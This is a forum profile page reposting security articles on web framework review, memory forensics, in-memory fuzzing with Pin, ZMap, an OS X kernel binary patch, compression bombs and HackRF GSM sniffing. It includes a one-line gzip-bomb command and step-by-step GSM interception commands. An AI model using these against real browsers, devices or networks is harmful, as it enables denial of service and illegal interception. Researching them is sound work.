Jump to content

Nytro

Administrators
  • Posts

    18753
  • Joined

  • Last visited

  • Days Won

    726

Everything posted by Nytro

  1. [h=1]Web Framework Vulnerabilties - Abraham Kang[/h] from OWASP AppSec USA PRO 8 months ago not yet rated Title: Web Framework Vulnerabilities Abstract This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is trimmed down version of the 3 hour workshop given at Blackhat. This is an advanced talk and an understand of the application frameworks is a prerequisite to get the most out of this talk. ***** Speaker: Abraham Kang, Principal Security Researcher, HP Fortify Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked with application security for over 10 years with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect. ***** Date: Friday October 26, 2012 3:00pm - 3:45pm Location: AppSecUSA, Austin, TX. Hyatt Regency Hotel. Track: Attack Sursa: Web Framework Vulnerabilties - Abraham Kang on Vimeo
  2. [h=1]Visualizing Recovered Executables from Memory Images[/h]jessekornblum (jessekornblum) wrote, I like to use a picture to help explain how we can recover executables from memory images. For example, here's the image I was using 2008: This post will explain what's happening in that picture—how PE executables are loaded and recovered—and provide a different visualization of the process. Instead of just a stylized representation, we can produce pictures from actual data. This post explains how to do that and the tools used in the process. When executables are loaded from the disk, Windows uses the PE header to determine how many pages, and with which permissions, will be allocated for each section. The header describes the size and location of each section on the disk and its size and location in memory. Because the sections needs to page aligned in memory, but not on the disk, this generally results in some space being added between the sections when they're loaded into memory. There are also changes made in memory due to relocations and imported functions. When we recover executables from memory, we can use the PE header to map the sections back to their size and locations as they were on the disk. Generally memory forensics tools don't undo the other modifications made by the Windows loader. The changes made in memory remain the new version we recover. In addition, due to paging and other limitations we don't always get all of the pages of the executable from memory. They could have been paged out, are invalid, or were never loaded in the first place. That's a tidy description of the picture above. The reality, of course, is a little messier. I've used my colorize and filecompare tools to produce visualizations for an executable on the disk, what it looked like in memory, and what it looked like when recovered from the memory image. In addition to those tools, I used the Volatility™ memory forensics framework [1] and the Picasion tool for making animated gifs [2]. For the memory image, I'm using the xp-laptop memory image from the NIST CFReDS project [3]. In particular, we'll be looking at cmd.exe, process 3256. Here's a representation of the original executable from the disk as produced with colorize. This image is a little different than some of the others I've posted before. Instead of being vertically oriented, it's horizontal. The data starts at the top left, and then goes down and then right. I've also changed the images to be 512 pixels wide instead of the default 100. I made the image this way to make it appear similar to the image at the start of this post. Here's the command I used to generate the picture: $ colorize -o -w 512 cmd.exe and here's the result: http://jessekornblum.com/tools/colorize/img/cmd.exe.bmp It gets interesting when we compare this picture to the data we can recover from the memory image. First, we can recover the in-memory representation of the executable using the Volatility™ plugin procmemdump. In the files generated by this plugin the pages are memory aligned, not disk aligned. Here's the command line to run the plugin: $ python vol.py -f cases/xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procmemdump --pid=3256 --dump-dir=output Volatile Systems Volatility Framework 2.3_alpha Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x8153f480 0x4ad00000 cmd.exe OK: executable.3256.exe Here's how we can colorize it: $ mv executable.3256.exe executable-procmemdump.3256.exe $ colorize -o -w 512 executable-procmemdump.3256.exe Which leads to this result: http://jessekornblum.com/tools/colorize/img/executable-procmemdump.3256.exe.bmp There's a lot going on here, but things will get more clear with a third image. For the third picture we'll recover the executable again, but this time realigning the sections back to how there were on the disk. This is done by parsing the PE header in memory and using it to undo some of the changes made when it was loaded. We can do this using the procexedump plugin, like this: $ python vol.py -f xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procexedump --pid=3256 --dump-dir=output Volatile Systems Volatility Framework 2.3_alpha Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x8153f480 0x4ad00000 cmd.exe OK: executable.3256.exe We repeat the process for colorizing this sample: $ mv executable.3256.exe executable-procexedump.3256.exe $ colorize -o -w 512 executable-procexedump.3256.exe Which produces this image: http://jessekornblum.com/tools/colorize/img/executable-procexedump.3256.exe.bmp First, let's compare the recovered executable back to the original. Even before we start our visualizations, we can see there were changes between the original and this version. The MD5 hashes of the two files are different: $ md5deep -b cmd.exe executable-procexedump.3256.exe eeb024f2c81f0d55936fb825d21a91d6 cmd.exe ff8a9a332a9471e1bf8d5cebb941fc66 executable-procexedump.3256.exe Amazingly, however, they match using fuzzy hashing via the ssdeep tool [4]: $ ssdeep -bda cmd.exe executable-procexedump.3256.exe executable-procexedump.3256.exe matches cmd.exe (66) There's also a match with the sdhash similarity detection tool [5]: $ sdhash -g -t 0 cmd.exe executable-procexedump.3256.exe cmd.exe|executable-procexedump.3256.exe|046 (You haven't heard of sdhash? Don't get tunnel vision! There are many similarity detection tools.) Those matches are good signs. But attempting to compare the colorized image of the recovered executable back to the original is a little tricky. To make it easier, I made a kind of blink comparator. The free site Picasion allows you to make animated GIFs from submitted pictures. Combined with some annotations on the pictures, here's the result: There are two important things to notice here. First, we didn't recover all of the executable. The bands of black which appear on the left-hand side in the recovered image are pages which weren't found in memory. Also notice how much of the data from the end of the file is missing, too. Almost all of it! (Isn't it amazing that fuzzy hashing can still generate a match between these two files?) The second thing to notice is the changes in the data. It's a little hard to see in the GIF, but you can get a better view using the filecompare and colorize tools together. We can compare the two files at the byte level and then colorize the result: $ filecompare -b 1 cmd.exe executable-procexedump.3256.exe > orig-to-exe.dat $ colorize -o - w 512 orig-to-exe.dat Here's the result: http://jessekornblum.com/tools/colorize/img/orig-to-exe.dat.bmp Here we can clearly see, in red, the changes throughout the file. The blocks of mostly red, or heavily speckled red, and the places where we weren't able to recover data from the memory image. Because some of the values in the original executable were zeros, those appear to match the zeros we recovered from the memory image--hence the speckled pattern. The changes to the executable you can clearly see a pattern of dashed red lines. Finally, we can visualize the changes between the in-memory representation of the file and the disk representation the file. I've made another animated GIF, this time between these versions of the executable as recovered by procexedump and procmemdump: The most obvious difference between these two pictures is the black band on the left-hand side of the image. That's the space, created by the realignment from disk to memory, being added by the Windows loader to page align the first section of the executable. [h=3]References[/h][1] The Volatility™ framework, https://code.google.com/p/volatility/. Volatility™ is a trademark of Verizon. Jesse Kornblum is not sponsored or approved by, or affiliated with Verizon.[2] Picasion.com, Picasion GIF maker - Create GIF animations online - Make an Animated GIF. [3] The Computer Forensic Reference Data Sets project, National Institute of Standards and Technology, The CFReDS Project. [4] Jesse Kornblum, ssdeep, Fuzzy Hashing and ssdeep. [5] Vassil Roussev, sdhash, http://sdhash.org/. Sursa: jessekornblum: Visualizing Recovered Executables from Memory Images
  3. In-Memory fuzzing with Pin by Jonathan Salwan - 2013-08-17 In my previous blog post, I talked about the taint analysis and the pattern matching with Pin. In this short post, I will always talk about Pin, but this time about the In-Memory fuzzing. 1 - In-Memory fuzzing 1.1 - Little introduction In-Memory fuzzing is a technique which consists to target and test a specific basic block, function or portion of a program. To be honest, this technique is not really satisfactory over a large portion of code, this is mainly used for a quick analysis. However it's really straightforward to implement it. For that, we just need to : Choose a targeted piece of code. Set a breakpoint before and after our targeted area. Save the execution context when the first breakpoint occurs. Restore the execution context when the second breakpoint occurs. Catch the SIGSEGV signal. Repeat the operation 3 and 4 until the crash occurs. 1.2 - Little example For a little example, see the following graph. Now, imagine that the user can control the first argument, that means he can control the rdi register in the first basic block and [rbp+var_4] in this stack frame. In this case, we are interested to test the orange basic block. As you can see below, in the orange basic block we have a "mov eax, [rbp+var_4]", that means we can control the eax register. So, we will apply the In-Memory fuzzing technique in this basic block between the "cdqe" and "mov eax, 0" instructions and we will fuzz the eax register. Use the Pin API The Pin API provides all what we need to apply the In-Memory fuzzing technique. To catch the signals, we use the PIN_InterceptSignal() function. This function takes the type of signal and a callback. So, to catch the SIGSEGV signal, in our main function we have something like that: PIN_InterceptSignal(SIGSEGV, catchSignal, 0); Our call back catchSignal, displays just the current context when the signal occurs. Then, because Pin is a DBI framework (Dynamic Binary Instrumentation), we can't set a breakpoint, but that's not really important. With a DBI framework we can control each instruction before and after their execution. So, we will use the PIN_SaveContext() and PIN_ExecuteAt() functions when the first and last targeted instruction occurs. A CONTEXT in Pin, is just the registers state of the processor. That means, when you call PIN_SaveContext(), you save only the state of registers, not the memory. So, to monitor the STORE access, we use the INS_MemoryOperandIsWritten() function. When a STORE occurs, we save the original value and we restore it when the context is restored. That's all, we can see the full source code here. In-Memory fuzzing Pin tool This Pin tool requires three arguments and can take three optional arguments. Required -------- -start <address> The start address of the fuzzing area -end <address> The end address of the fuzzing area -reg <register> The register which will be fuzzed Optional -------- -startValue <value> The start value -maxValue <value> The end value -fuzzingType <"inc" | "random"> Type of fuzzing: incremental or random If we take the above example and that we want to fuzz the orange basic block, we have something like that: $ time pin -t ./InMemoryFuzzing.so -start 0x4005a5 -end 0x4005bb -reg rax -fuzzingType inc \ -startValue 1 -maxValue 0x3000 -- ./test 1 > dump [2] 8472 segmentation fault 0.53s user 0.20s system 99% cpu 0.729 total I used the "time" command to show you how Pin is efficient - I've also redirected stdout in a file called 'dump' because of the output log size (5.5M). At the end of this dump, you can see the context when the SIGSEGV occurs - Current RIP = 0x4005a5 "movzx eax, byte ptr [rax]" with RAX = 0x2420. [Restore Context] [Save Context] [CONTEXT]=---------------------------------------------------------- RAX = 0000000000002420 RBX = 0000000000000000 RCX = 00007fff3134c168 RDX = 00007fff3134abe0 RDI = 0000000000000001 RSI = 00007fff3134abe0 RBP = 00007fff3134abc0 RSP = 00007fff3134abb0 RIP = 00000000004005a5 +------------------------------------------------------------------- +--> 4005a5: cdqe +--> 4005a7: add rax, qword ptr [rbp-0x10] +--> 4005ab: movzx eax, byte ptr [rax] /!\ SIGSEGV received /!\ [SIGSGV]=---------------------------------------------------------- RAX = 00007fff3134d000 RBX = 0000000000000000 RCX = 00007fff3134c168 RDX = 00007fff3134abe0 RDI = 0000000000000001 RSI = 00007fff3134abe0 RBP = 00007fff3134abc0 RSP = 00007fff3134abb0 RIP = 00000000004005ab +------------------------------------------------------------------- You can download this Pin tool here. Sursa: shell-storm | In-Memory fuzzing with Pin
  4. ZMap The Internet Scanner v1.0.3 released ZMap is an open-source network scanner that enables researchers to easily perform Internet-wide network studies. With a single machine and a well provisioned network uplink, ZMap is capable of performing a complete scan of the IPv4 address space in under 45 minutes, approaching the theoretical limit of gigabit Ethernet. ZMap can be used to study protocol adoption over time, monitor service availability, and help us better understand large systems distributed across the Internet. ZMap is designed to perform comprehensive scans of the IPv4 address space or large portions of it. While ZMap is a powerful tool for researchers, please keep in mind that by running ZMap, you are potentially scanning the ENTIRE IPv4 address space at over 1.4 million packets per second. Before performing even small scans, we encourage users to contact their local network administrators and consult our list of scanning best practices. By default, ZMap will perform a TCP SYN scan on the specified port at the maximum rate possible. A more conservative configuration that will scan 10,000 random addresses on port 80 at a maximum 10 Mbps can be run as follows: $ zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.txt Download: https://zmap.io/download.html
  5. Hacking the OS X Kernel for Fun and Profiles Posted on Tuesday, August 13, 2013. My last post described how user-level CPU profilers work, and specifically how Google’s pprof profiler gathers its CPU profiles with the help of the operating system. The specific feature needed from the operating system is the profiling timer provided by setitimer(2) and the SIGPROF signals that it delivers. If the operating system’s implementation of that feature doesn’t work, then the profiler doesn’t work. This post looks at a common bug in Unix implementations of profiling signals and the fix for OS X, applied by editing the OS X kernel binary. If you haven’t read “How to Build a User-Level CPU Profiler,’’ you might want to start there. Unix and Signals and Threads My earlier post referred to profiling programs, without mention of processes or threads. Unix in general and SIGPROF in particular predate the idea of threads. SIGPROF originated in the 4.2BSD release of Berkeley Unix, published in 1983. In Unix at the time, a process was a single thread of execution. Threads did not come easily to Unix. Early implementations were slow and buggy and best avoided. Each of the popular Unix variants added thread support independently, with many shared mistakes. Even before we get to implementation, many of the original Unix APIs are incompatible with the idea of threads. Multithreaded processes allow multiple threads of execution in a single process address space. Unix maintains much per-process state, and the kernel authors must decide whether each piece of state should remain per-process or change to be per-thread. For example, the single process stack must be split into per-thread stacks: it is impossible for independently executing threads to be running on a single stack. Because there are many threads, thread stacks tend to be smaller than the one big process stack that non-threaded Unix programs had. As a result, it can be important to define a separate stack for running signal handlers. That setting is per-thread, for the same reason that ordinary stacks are per-thread. But the choice of handler is per-process. File descriptors are per-process, but then one thread might open a file moments before another thread forks and execs a new program. In order for the open file not to be inherited by the new program, we must introduce a new variant of open(2) that can open a file descriptor atomically marked “close on exec.’’ And not just open: every system call that creates a new file descriptor needs a variant that creates the file descriptor “close on exec.’’ Memory is per-process, so malloc must use a lock to serialize access by independent threads. But again, one thread might acquire the malloc lock moments before another thread forks and execs a new program. The fork makes a new copy of the current process memory, including the locked malloc lock, and that copy will never see the unlock by the thread in the original program. So the child of fork can no longer use malloc without occasional deadlocks. That’s just the tip of the iceberg. There are a lot of changes to make, and it’s easy to miss one. Profiling Signals Here’s a thread-related change that is easy to miss. The goal of the profiling signal is to enable user-level profiling. The signal is sent in response to a program using up a certain amount of CPU time. More specifically, in a multithreaded kernel, the profiling signal is sent when the hardware timer interrupts a thread and the timer interrupt handler finds that the execution of that thread has caused the thread’s process’s profiling timer to expire. In order to profile the code whose execution triggered the timer, the profiling signal must be sent to the thread that is running. If the signal is sent to a thread that is not running, the profile will record idleness such as being blocked on I/O or sleeping as execution and will be neither accurate nor useful. Modern Unix kernels support sending a signal to a process, in which case it can be delivered to an arbitrary thread, or to a specific thread. Kill(2) sends a signal to a process, and pthread_kill(2) sends a signal to a specific thread within a process. Before Unix had threads, the code that delivered a profiling signal looked like psignal(p, SIGPROF), where psignal is a clearer name for the implementation of the kill(2) system call and p is the process with the timer that just expired. If there is just one thread per process, delivering the signal to the process cannot possibly deliver it to the wrong thread. In multithreaded programs, the SIGPROF must be delivered to the running thread: the kernel must call the internal equivalent of pthread_kill(2), not kill(2). FreeBSD and Linux deliver profiling signals correctly. Empirically, NetBSD, OpenBSD, and OS X do not. (Here is a simple C test program.) Without correct delivery of profiling signals, it is impossible to build a correct profiler. OS X Signal Delivery To Apple’s credit, the OS X kernel sources are published and open source, so we can look more closely at the buggy OS X implementation. The profiling signals are delivered by the function bsd_ast in the file kern_sig.c. Here is the relevant bit of code: voidbsd_ast(thread_t thread) { proc_t p = current_proc(); ... if (timerisset(&p->p_vtimer_prof.it_value)) { uint32_t microsecs; task_vtimer_update(p->task, TASK_VTIMER_PROF, &microsecs); if (!itimerdecr(p, &p->p_vtimer_prof, microsecs)) { if (timerisset(&p->p_vtimer_prof.it_value)) task_vtimer_set(p->task, TASK_VTIMER_PROF); else task_vtimer_clear(p->task, TASK_VTIMER_PROF); psignal(p, SIGPROF); } } ... } The bsd_ast function is the BSD half of the OS X timer interrupt handler. If profiling is enabled, bsd_ast decrements the timer and sends the signal if the timer expires. The innermost if statement is resetting the the timer state, because setitimer(2) allows both one-shot and periodic timers. As predicted, the code is sending the profiling signal to the process, not to the current thread. There is a function psignal_uthread defined in the same source file that sends a signal instead to a specific thread. One possible fix is very simple: change psignal to psignal_uthread. I filed a report about this bug as Apple Bug Report #9177434 in March 2011, but the bug has persisted in subsequent releases of OS X. In my report, I suggested a different fix, inside the implementation of psignal, but changing psignal to psignal_uthread is even simpler. Let’s do that. Patching the Kernel It should be possible to rebuild the OS X kernel from the released sources. However, I do not know whether the sources are complete, and I do not know what configuration I need to use to recreate the kernel on my machine. I have no confidence that I’d end up with a kernel appropriate for my computer. Since the fix is so simple, it should be possible to just modify the standard OS X kernel binary directly. That binary lives in /mach_kernel on OS X computers. If we run gdb on /mach_kernel we can see the compiled machine code for bsd_ast and find the section we care about. $ gdb /mach_kernel(gdb) disas bsd_astDump of assembler code for function bsd_ast:0xffffff8000568a50 <bsd_ast+0>: push %rbp0xffffff8000568a51 <bsd_ast+1>: mov %rsp,%rbp...if (timerisset(&p->p_vtimer_prof.it_value))0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15)0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319>0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15)0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335>task_vtimer_set(p->task, TASK_VTIMER_PROF);0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set>0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349>task_vtimer_clear(p->task, TASK_VTIMER_PROF);0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear>psignal(p, SIGPROF);0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224>... I’ve annotated the assembly with the corresponding C code in italics. The final sequence is odd. It should be a call to psignal but instead it is a call to code 224 bytes beyond the start of the threadsignal function. What’s going on is that psignal is a thin wrapper around psignal_internal, and that wrapper has been inlined. Since psignal_internal is a static function, it does not appear in the kernel symbol table, and so gdb doesn’t know its name. The definitions of psignal and psignal_uthread are: voidpsignal(proc_t p, int signum) { psignal_internal(p, NULL, NULL, 0, signum); } static void psignal_uthread(thread_t thread, int signum) { psignal_internal(PROC_NULL, TASK_NULL, thread, PSIG_THREAD, signum); } With the constants expanded, the call we’re seeing is psignal_internal(p, 0, 0, 0, 0x1b) and the call we want to turn it into is psignal_internal(0, 0, thread, 4, 0x1b). All we need to do is prepare the different argument list. Unfortunately, the thread variable was passed to bsd_ast in a register, and since it is no longer needed where we are in the function, the register has been reused for other purposes: thread is gone. Fortunately, bsd_ast’s one and only invocation in the kernel is bsd_ast(current_thread()), so we can reconstruct the value by calling current_thread ourselves. Unfortunately, there is no room in the 15 bytes from bsd_ast+349 to bsd_ast+364 to insert such a call and still prepare the other arguments. Fortunately, we can optimize a bit of the preceding code to make room. Notice that the calls to task_vtimer_set and task_vtimer_clear are passing the same argument list, and that argument list is prepared in both sides of the conditional: ... if (timerisset(&p->p_vtimer_prof.it_value)) 0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15) 0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319> 0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15) 0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335> task_vtimer_set(p->task, TASK_VTIMER_PROF); 0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi 0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi 0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set> 0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349> task_vtimer_clear(p->task, TASK_VTIMER_PROF); 0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi 0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi 0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear> psignal(p, SIGPROF); 0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi 0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi 0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx 0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx 0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d 0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224> ... We can pull that call setup above the conditional, eliminating one copy and giving ourselves nine bytes to use for delivering the signal. A call to current_thread would take five bytes, and then moving the result into an appropriate register would take two more, so nine is plenty. In fact, since we have nine bytes, we can inline the body of current_thread—a single nine-byte mov instruction—and change it to store the result to the correct register directly. That avoids needing to prepare a position-dependent call instruction. The final version is: ... 0xffffff8000568b7b <bsd_ast+299>: mov 0x18(%r15),%rdi 0xffffff8000568b7f <bsd_ast+303>: mov $0x2,%esi 0xffffff8000568b84 <bsd_ast+308>: cmpq $0x0,0x1e0(%r15) 0xffffff8000568b8c <bsd_ast+316>: jne 0xffffff8000568b98 <bsd_ast+328> 0xffffff8000568b8e <bsd_ast+318>: cmpl $0x0,0x1e8(%r15) 0xffffff8000568b96 <bsd_ast+326>: je 0xffffff8000568b9f <bsd_ast+335> 0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set> 0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568ba4 <bsd_ast+340> 0xffffff8000568b9f <bsd_ast+335>: callq 0xffffff8000237660 <task_vtimer_clear> 0xffffff8000568ba4 <bsd_ast+340>: xor %edi,%edi 0xffffff8000568ba6 <bsd_ast+342>: xor %esi,%esi 0xffffff8000568ba8 <bsd_ast+344>: mov %gs:0x8,%rdx 0xffffff8000568bb1 <bsd_ast+353>: mov $0x4,%ecx 0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d 0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224> ... If we hadn’t found the duplicate call setup to factor out, another possible approach would have been to factor the two very similar code blocks handling SIGVTALRM and SIGPROF into a single subroutine, sitting in the middle of the bsd_ast function code, and to call it twice. Removing the second copy of the code would leave plenty of space for the longer psignal_uthread call setup. The code we’ve been using is from OS X Mountain Lion, but all versions of OS X have this bug, and the relevant bits of bsd_ast haven’t changed from version to version, although the compiler and therefore the generated code do change. Even so, all have the basic pattern and all can be fixed with the same kind of rewrite. Using the Patch If you use the Go or the C++ gperftools and want accurate CPU profiles on OS X, I’ve packaged up the binary patcher as code.google.com/p/rsc/cmd/pprof_mac_fix. It can handle OS X Snow Leopard, Lion, and Mountain Lion. Will OS X Mavericks need a fix too? We’ll see. Further Reading Binary patching is an old, venerable technique. This is just a simple instance of it. If you liked reading about this, you may also like to read Jeff Arnold’s paper “Ksplice: Automatic Rebootless Kernel Updates.’’ Ksplice can construct binary patches for Linux security vulnerabilities and apply them on the fly to a running system. Sursa: research!rsc: Hacking the OS X Kernel for Fun and Profiles
  6. Vulnerabilities that just won't die - Compression Bombs Recently Cyberis has reviewed a number of next-generation firewalls and content inspection devices - a subset of the test cases we formed related to compression bombs - specifically delivered over HTTP. The research prompted us to take another look at how modern browsers handle such content given that the vulnerability (or perhaps more accurately, ‘common weakness’ - CWE - CWE-409: Improper Handling of Highly Compressed Data (Data Amplification) (2.5)) has been reported and well known for over ten years. The results surprised us - in short, the majority of web browsers are still vulnerable to compression bombs leading to various denial-of-service conditions, including in some cases, full exhaustion of all available disk space with no user input. Introduction to HTTP Compression HTTP compression is a capability widely supported by web browsers and other HTTP User-Agents, allowing bandwidth and transmission speeds to be maximised between client and server. Supporting clients will advertise supported compression schemas, and if a mutually supported scheme can be negotiated, the server will respond with a compressed HTTP response. Compatible User-Agents will typically decompress encoded data on-the-fly. HTML content, images and other files transmitted are usually handled in memory (allowing pages to rendered as quickly as possible), whilst larger file downloads will usually be decompressed straight to disk to prevent unnecessary consumption of memory resources on the client. Gzip (RFC1952) is considered the most widely supported compression schema in use today, although the common weaknesses discussed in this post are applicable to all schemas in use today. What is a Compression Bomb? Quite simply, a compression bomb is compressed content that extracts to a size much larger than the developer expected; in other words, incorrect handling of highly compressed data. This can result in various denial-of-service conditions, for example memory, CPU and free disk space exhaustion. Using an entropy rate of zero (for example, /dev/zero), coupled with multiple rounds of encoding that modern browsers support (see our ResponseCoder post), a 43 Kilobyte HTTP server response will equate to a 1 Terabyte file when decompressed by a receiving client - an effective compression ratio of 25,127,100:1. It is trivial to make a gzip bomb on the Linux command line - see below for an example of a 10MB file being compressed to just 159 bytes using two rounds of gzip compression: $ dd if=/dev/zero bs=10M count=1 | gzip -9 | gzip -9 | wc -c 1+0 records in 1+0 records out 10485760 bytes (10 MB) copied, 0.149518 s, 70.1 MB/s 159 Testing Framework Cyberis has released a testing framework, both for generic HTTP response tampering and various sizes of gzip bombs. GzipBloat (https://www.github.com/cyberisltd/GzipBloat) is a PHP script to deliver pre-compressed gzipped content to a browser, specifying the correct HTTP response headers for the number of encoding rounds used, and optionally a ‘Content-Disposition’ header. A more generic response tampering framework - ResponseCoder (https://www.github.com/cyberisltd/ResponseCoder) - allows more fine grained control, although content is currently compressed on the fly - limiting its effectiveness when used to deliver HTTP compression bombs. Both tools are designed to assist you in testing both intermediary devices (content inspection/next-generation firewalls etc.) and browsers for compression bomb vulnerabilities. During our tests, we delivered compressed content in a variety of different forms, both as ‘file downloads’ and in-line ‘HTML content’. The exact tests we conducted and the results can be read in our more detailed paper on this topic here. Is my Browser Vulnerable? It is actually easier to name the browser that is not vulnerable - namely Opera - all other major desktop browsers (Internet Explorer, Firefox, Chrome, Safari) available today exhibited at least one denial-of-service condition during our test. The most serious condition observed was an effective denial-of-service against Windows operating systems when a large gzip encoded file is returned with a ‘Content-Disposition’ header - no user interaction was required to exploit the vulnerability, and recovery from the condition required knowledge of the Temporary Internet Files directory structure and command line access. This seemed to affect all recent versions of IE, including IE11 on Windows 8.1 Preview. Our results demonstrated that the most popular web browsers in use today are vulnerable to various denial-of-service conditions - namely memory, CPU and free disk space consumption - by failing to consider the high compression ratios possible from data with an entropy rate of zero. Depending on the HTTP response headers used, vulnerable browsers will either decompress the content in memory, or directly to disk - only terminating when operating system resources are exhausted. Conclusion With the growth of mobile data connectivity, improvements in data compression for Internet communications has become highly desirable from a performance perspective, but extensions to these techniques outside of original protocol specifications can have unconsidered impacts for security. Although compression bombs have been a known threat for a number of years, the growing ubiquity of advanced content inspection devices, and the proliferation User-Agents which handle compression mechanisms differently, has substantially changed the landscape for these types of attack. The attacks discussed here will provide an effective denial-of-service against a number of popular client browsers, but the impact in these cases is rather limited. Ultimately, the greater impact of this style of attack is likely to be felt by intermediate content inspection devices with a large pool of users. It is possible a number of advanced content inspection devices may be susceptible to these decompression denial-of-service attacks themselves, potentially as the result of a single server-client response. In an environment with high availability requirements and a large pool of users, a denial-of-service attack which could be launched by a single malicious Internet server could have a devastating impact. Posted by Cyberis at 07:36 Sursa: Cyberis Blog: Vulnerabilities that just won't die - Compression Bombs
  7. [h=3]Sniffing GSM with HackRF[/h]by admin » Wed Aug 14, 2013 1:29 am I will open by saying only sniff your own system or a system you have been given permission to work on, Sniffing a public network in your country may be illegal. I recently had a play with sniffing some gsm using the HackRF, The clock was a little unstable and drifted quite a bit but in the end I was able to view lots of different system messages etc. I will assume you have a working linux system with gnuradio and hackrf running for this turotial, If not you can use the live cd which I referenced in the software section of the forum its a great tool and the hackrf works right out of the box. First thing to do is find out the freq of a local gsm tower for this I used gqrx which is pre loaded on the live cd, open it up and have a look around the 900mhz band and you should see something like the image below. gqerx.png (274.82 KiB) Viewed 6938 times You can see the non hopping channel at 952Mhz and another at 944.2Mhz write down the approximate frequency for the later step. Now we need to install Airprobe using the following commands. git clone git://git.gnumonks.org/airprobe.git cd airprobe/gsmdecode ./bootstrap ./configure make cd airprobe/gsm-receiver ./bootstrap ./configure make Thats all there is too it we can now start recieving some gsm first things first start wireshark with the following command: sudo wireshark Select "lo" as the capture device and enter gsmtap in the filter window like in the image below: wireshark.png (66.89 KiB) Viewed 6938 times Now go back to your terminal window and enter the following: cd airprobe/gsm-receiver/src/python ./gsm_receive_rtl.py -s 2e6 A window will pop up and the first thing is to do is uncheck auto gain and set the slider to full, then enter the gsm frequency you noted before as the center frequency. Also select peak hold and average in the top windows trace options like so: spectrum.png (109.9 KiB) Viewed 6938 times You will see that only signal on the right (blue line) consitently stays in place over the peak hold (green line) indicating that it is the non hopping channel, All we need to do to start decoding is in the top window click on the center of that frequency hump. You may see some error coming up but that is ok eventually it will start to capture data something like this: data.png (225.52 KiB) Viewed 6938 times You can now see the gsm data popping up in wireshark, as I said at the beginning the hackrf clock does drift so you will need to keep clicking to re-center the correct frequency but all in all it works pretty good. As silly as it may sound wraping your hack rf in a towel or similar really helps the thermal stability of the clock and reduces drift. Now this "hack" is obviously not very usefull on its own but I think atleast it helps to show the massive amounts of potential there is in the HackRF. Sursa: BinaryRF.com • View topic - Sniffing GSM with HackRF
